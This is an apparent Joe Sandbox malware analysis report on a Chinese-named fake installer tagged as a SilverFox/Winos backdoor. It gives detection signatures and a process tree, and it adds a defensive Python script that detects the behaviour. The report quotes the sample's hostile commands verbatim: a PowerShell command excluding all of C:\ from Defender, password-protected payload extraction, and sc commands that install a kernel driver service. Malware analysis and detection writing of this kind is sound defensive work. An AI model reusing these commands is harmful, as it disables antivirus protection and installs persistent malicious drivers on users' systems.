Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.7.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.7.exe (Joe Sandbox writes non-ASCII filename characters as #Uxxxx escapes; decoded, the name is 安装助手_2.0.7.exe, "Installation Assistant 2.0.7")
renamed because original name is a hash value
Original sample name: _2.0.7.exe
Analysis ID:1579756
MD5:b7289fd08cd04c771fd7c9b06477601a
SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • svchost.exe (PID: 5900 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6208 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6344 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: B7289FD08CD04C771FD7C9B06477601A)
    • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 1424 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 7192 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_2.0.7.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: B7289FD08CD04C771FD7C9B06477601A)
        • #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (PID: 7520 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 7676 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7760 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6688 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2012 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7328 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 7636 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7656 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7840 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7856 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7900 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8096 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8108 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8180 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7248 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7000 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1660 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6708 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6132 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1168 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1252 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1588 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2040 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1964 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7752 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7748 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7680 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2860 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7836 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7788 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7972 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8004 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8036 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8128 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8172 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5908 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7248 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7080 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1260 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1424 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1912 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 1424, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7656, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 1424, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentCommandLine: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe", ParentImage: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe, ParentProcessId: 5496, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ProcessId: 1424, ProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7636, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7656, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ParentProcessId: 1424, ParentProcessName: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7192, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5900, ProcessName: svchost.exe
No Suricata rule has matched
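The Sigma matches above fire on single process-creation events. The Python below is an added example, not part of the Joe Sandbox report or of any Sigma rule, that runs the same three checks over constructed Sysmon-style events whose command lines copy the ones in this report: a Defender exclusion whose path is a whole drive root (also after decoding a -EncodedCommand argument, the obfuscated form the "Powershell Base64 Encoded MpPreference Cmdlet" rule is aimed at), an sc.exe kernel service whose binPath is not a .sys file, and the burst of repeated `sc start` attempts visible in the process tree. The event list, the PIDs of the burst, the final narrow-path exclusion event and the threshold of five starts are all constructed or chosen for the example.

```python
import base64
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional, Tuple

Event = Dict[str, str]

# Constructed Sysmon-style process-creation events. The command lines copy the
# report's; the PIDs of the retry burst and the last (narrow, benign-looking)
# exclusion event are made up for this example.
EVENTS: List[Event] = (
    [
        {"ProcessId": "7192",
         "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""},
        {"ProcessId": "7656",
         "Image": r"C:\Windows\System32\sc.exe",
         "CommandLine": 'sc create CleverSoar displayname= CleverSoar binPath= '
                        '"C:\\Program Files (x86)\\Windows NT\\tProtect.dll" type= kernel start= auto'},
    ]
    + [{"ProcessId": str(7856 + i), "Image": r"C:\Windows\System32\sc.exe",
        "CommandLine": "sc start CleverSoar"} for i in range(30)]
    + [{"ProcessId": "4242",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -Command \"Add-MpPreference -ExclusionPath 'C:\\Program Files\\Vendor\\scanner'\""}]
)

# -EncodedCommand and the abbreviations PowerShell accepts for it, followed by base64.
_ENC = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# An exclusion whose path is a bare drive root such as C:\ or C:, quoted or not.
_ROOT_EXCL = re.compile(
    r"(?:Add|Set)-MpPreference\b.*?-ExclusionPath\s+['\"]?([A-Za-z]:\\?)(?=['\"\s,;]|$)",
    re.I | re.S)
_SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(\S+)", re.I)
_BINPATH = re.compile(r"binPath=\s*(?:\"([^\"]+)\"|(\S+))", re.I)
_KERNEL = re.compile(r"type=\s*kernel\b", re.I)
_SC_START = re.compile(r"\bsc(?:\.exe)?\s+start\s+(\S+)", re.I)


def encode_for_powershell(script: str) -> str:
    """Base64 of UTF-16LE, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_encoded(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (if any) so the plain-text
    rules below also see invocations that hide the cmdlet behind base64."""
    m = _ENC.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # not valid base64 after all
        return cmd


def defender_root_exclusion(cmd: str) -> Optional[str]:
    """Return the drive root excluded from Defender scanning, or None."""
    m = _ROOT_EXCL.search(cmd)
    return m.group(1) if m else None


def kernel_service_with_odd_binary(cmd: str) -> Optional[Tuple[str, str]]:
    """Return (service, binPath) for an `sc create ... type= kernel` whose
    binary is not a .sys file, e.g. the tProtect.dll driver in this report."""
    m = _SC_CREATE.search(cmd)
    if not m or not _KERNEL.search(cmd):
        return None
    b = _BINPATH.search(cmd)
    if not b:
        return None
    path = b.group(1) or b.group(2)
    return None if path.lower().endswith(".sys") else (m.group(1), path)


def start_retry_bursts(events: Iterable[Event], threshold: int = 5) -> Dict[str, int]:
    """Count `sc start <service>` per service (sc.exe images only, so the
    `cmd /c start sc start ...` wrapper is not counted twice) and report the
    services started at least `threshold` times; the threshold is a chosen value."""
    counts: Counter = Counter()
    for ev in events:
        if not ev.get("Image", "").lower().endswith("sc.exe"):
            continue
        m = _SC_START.search(ev.get("CommandLine", ""))
        if m:
            counts[m.group(1)] += 1
    return {svc: n for svc, n in counts.items() if n >= threshold}


def run_detections(events: Iterable[Event]) -> List[Tuple[str, str, str]]:
    """(rule, ProcessId, detail) for every hit; per-event rules first, then the
    burst rule, which needs the whole event stream."""
    events = list(events)
    hits: List[Tuple[str, str, str]] = []
    for ev in events:
        cmd = expand_encoded(ev.get("CommandLine", ""))
        root = defender_root_exclusion(cmd)
        if root:
            hits.append(("defender_root_exclusion", ev["ProcessId"], root))
        svc = kernel_service_with_odd_binary(cmd)
        if svc:
            hits.append(("kernel_service_non_sys_binary", ev["ProcessId"], f"{svc[0]} -> {svc[1]}"))
    for svc, n in start_retry_bursts(events).items():
        hits.append(("sc_start_retry_burst", "-", f"{svc} x{n}"))
    return hits


if __name__ == "__main__":
    for hit in run_detections(EVENTS):
        print(*hit, sep="\t")
```

The narrow `C:\Program Files\Vendor\scanner` exclusion is deliberately not flagged: the point of the first rule is the scope of the exclusion, not the cmdlet itself. The burst rule is the one a per-event Sigma rule cannot express; on this sample it is also the loudest signal, since the installer keeps retrying `sc start CleverSoar` while the report shows no evidence the driver ever ran.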

AV Detection

Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Virustotal: Detection: 9%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 89.0% probability
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1399275561.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1399237456.0000000003550000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.19.dr
